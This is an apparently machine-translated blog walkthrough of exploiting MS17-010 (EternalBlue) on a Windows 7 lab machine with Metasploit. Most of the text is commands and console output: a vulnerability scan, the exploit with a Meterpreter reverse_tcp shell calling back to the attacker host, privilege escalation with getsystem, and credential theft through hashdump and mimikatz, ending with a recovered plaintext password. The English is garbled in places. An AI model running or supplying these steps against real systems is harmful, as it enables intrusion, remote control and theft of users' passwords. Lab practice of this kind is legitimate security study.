Shulou(Shulou.com)06/01 Report--

It is mainly convenient for me to forget it later, and write it, the boss bypasses it, and says the important three times. Ha ha

* Machine:

IP address: 192.168.10.15

System: kali linux

Target aircraft:

IP address: 192.168.10.13

System: win7

Start metasploit-framework

~ # msfconsole

Find the * module you need to use:

Msf > search ms17-010

Matching Modules

=

Name Disclosure Date Rank Description

Auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

Auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection

Exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

First use the auxiliary module auxiliary/scanner/smb/smb_ms17_010 to detect whether the target system has this vulnerability.

Msf > use auxiliary/scanner/smb/smb_ms17_010

Msf auxiliary (scanner/smb/smb_ms17_010) > options to see which parameters need to be set. Look at required. If the following is yes, it must be set.

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

-

CHECK_ARCH true no Check for architecture on vulnerable hosts

CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts

CHECK_PIPE false no Check for named pipe on vulnerable hosts

NAMED_PIPES / usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check

RHOSTS yes The target address range or CIDR identifier

RPORT 445 yes The SMB service port (TCP)

SMBDomain. No The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

THREADS 1 yes The number of concurrent threads

Msf auxiliary (scanner/smb/smb_ms17_010) > set rhosts 192.168.10.13 # most of the parameters have defaulted. You only need to set rhosts.

Rhosts = > 192.168.10.13

If you execute msf auxiliary (scanner/smb/smb_ms17_010) > run # you can see that there may be a ms17-010vulnerability in the returned result.

[+] 192.168.10.13 Host is likely VULNERABLE to MS17-010!-Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Use the exploit module:

Msf auxiliary (scanner/smb/smb_ms17_010) > back returns the upper layer with back. If you don't need it, you can select another module directly. Just say

Msf >

Msf > use exploit/windows/smb/ms17_010_eternalblue

Msf exploit (windows/smb/ms17_010_eternalblue) > options # View the parameters to be set

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

-

GroomAllocations 12 yes Initial number of times to groom the kernel pool.

GroomDelta 5 yes The amount to increase the groom count by per try.

MaxExploitAttempts 3 yes The number of times to retry the exploit.

ProcessName spoolsv.exe yes Process to inject payload into.

RHOST yes The target address

RPORT 445 yes The target port (TCP)

SMBDomain. No (Optional) The Windows domain to use for authentication

SMBPass no (Optional) The password for the specified username

SMBUser no (Optional) The username to authenticate as

VerifyArch true yes Check if remote architecture matches exploit Target.

VerifyTarget true yes Check if remote OS matches exploit Target.

Exploit target:

Id Name

-

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

Msf exploit (windows/smb/ms17_010_eternalblue) > set RHOST 192.168.10.13 # set target ip

RHOST = > 192.168.10.13

Msf exploit (windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp # set payload if it is a 32-bit system, use windows/meterpreter/reverse_tcp

Payload = > windows/x64/meterpreter/reverse_tcp

Msf exploit (windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

-

GroomAllocations 12 yes Initial number of times to groom the kernel pool.

GroomDelta 5 yes The amount to increase the groom count by per try.

MaxExploitAttempts 3 yes The number of times to retry the exploit.

ProcessName spoolsv.exe yes Process to inject payload into.

RHOST 192.168.10.13 yes The target address

RPORT 445 yes The target port (TCP)

SMBDomain. No (Optional) The Windows domain to use for authentication

SMBPass no (Optional) The password for the specified username

SMBUser no (Optional) The username to authenticate as

VerifyArch true yes Check if remote architecture matches exploit Target.

VerifyTarget true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

-

EXITFUNC thread yes Exit technique (Accepted:', seh, thread, process, none)

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

Msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.15 # set the local host

Lhost = > 192.168.10.15

Msf exploit (windows/smb/ms17_010_eternalblue) > run # execute

[*] Started reverse TCP handler on 192.168.10.15 purl 4444

[*] 192.168.10.13 445-Connecting to target for exploitation.

[+] 192.168.10.13 445-Connection established for exploitation.

[+] 192.168.10.13 445-Target OS selected valid for OS indicated by SMB reply

[*] 192.168.10.13 445-CORE raw buffer dump (38 bytes)

[*] 192.168.10.13 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima

[*] 192.168.10.13 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service

[*] 192.168.10.13 445-0x00000020 50 61 63 6b 20 31 Pack 1

[+] 192.168.10.13 445-Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.10.13 Trying exploit with 445-12 Groom Allocations.

[*] 192.168.10.13 445-Sending all but last fragment of exploit packet

[*] 192.168.10.13 445-Starting non-paged pool grooming

[+] 192.168.10.13 445-Sending SMBv2 buffers

[+] 192.168.10.13 445-Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.10.13 445-Sending final SMBv2 buffers.

[*] 192.168.10.13 445-Sending last fragment of exploit packet!

[*] 192.168.10.13 445-Receiving response from exploit packet

[+] 192.168.10.13 ETERNALBLUE overwrite completed successfully 445 (0xC000000D)!

[*] 192.168.10.13 445-Sending egg to corrupted connection.

[*] 192.168.10.13 445-Triggering free of corrupted buffer.

[-] 192.168.10.13 purl 445-=

[-] 192.168.10.13 FAIL-= 445-=-= middle may fail, be patient.

[-] 192.168.10.13 purl 445-=

[*] 192.168.10.13 445-Connecting to target for exploitation.

[+] 192.168.10.13 445-Connection established for exploitation.

[+] 192.168.10.13 445-Target OS selected valid for OS indicated by SMB reply

[*] 192.168.10.13 445-CORE raw buffer dump (38 bytes)

[*] 192.168.10.13 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima

[*] 192.168.10.13 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service

[*] 192.168.10.13 445-0x00000020 50 61 63 6b 20 31 Pack 1

[+] 192.168.10.13 445-Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.10.13 Trying exploit with 445-17 Groom Allocations.

[*] 192.168.10.13 445-Sending all but last fragment of exploit packet

[*] 192.168.10.13 445-Starting non-paged pool grooming

[+] 192.168.10.13 445-Sending SMBv2 buffers

[+] 192.168.10.13 445-Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.10.13 445-Sending final SMBv2 buffers.

[*] 192.168.10.13 445-Sending last fragment of exploit packet!

[*] 192.168.10.13 445-Receiving response from exploit packet

[+] 192.168.10.13 ETERNALBLUE overwrite completed successfully 445 (0xC000000D)!

[*] 192.168.10.13 445-Sending egg to corrupted connection.

[*] 192.168.10.13 445-Triggering free of corrupted buffer.

[*] Sending stage (206403 bytes) to 192.168.10.13

[*] Meterpreter session 1 opened (192.168.10.15 at 49341) at 2018-05-13 10:17:45 + 0800

[+] 192.168.10.13 purl 445-=

[+] 192.168.10.13 445-=-WIN-=-=

[+] 192.168.10.13 purl 445-=

Meterpreter > get a bounced meterpreter

Rights after *:

Meterpreter > sysinfo to view the information after the system

Computer: INI-PC

OS: Windows 7 (Build 7601, Service Pack 1).

Architecture: x64

System Language: zh_CN

Domain: WORKGROUP

Logged On Users: 2

Meterpreter: x64/windows

Meterpreter > getsystem = = "# it is quite smooth to use this method to lift the right. Sometimes it may not be possible to raise the right. You can also raise the right by bypassing UAC. For more information, please see: http://netsecurity.51cto.com/art/201612/524691.htm.

... got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Meterpreter > getuid

Server username: NT AUTHORITY\ SYSTEM

Grab the user's password:

Meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f22bada0de76a5744d444632dafa2a7:::

Ini:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

Meterpreter > load mimikatz load password extraction artifact,

Loading extension mimikatz...Success.

Meterpreter > kerberos

[+] Running as SYSTEM

[*] Retrieving kerberos credentials

Kerberos credentials

=

AuthID Package Domain User Password

-

0TX 997 Negotiate NT AUTHORITY LOCAL SERVICE

0t996 Negotiate WORKGROUP INI-PC$

047944 NTLM

0th 999 NTLM WORKGROUP INI-PC$

0TX 114022 NTLM ini-PC ini 123456

0There 113976 NTLM ini-PC ini 123456 # get the user's password

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.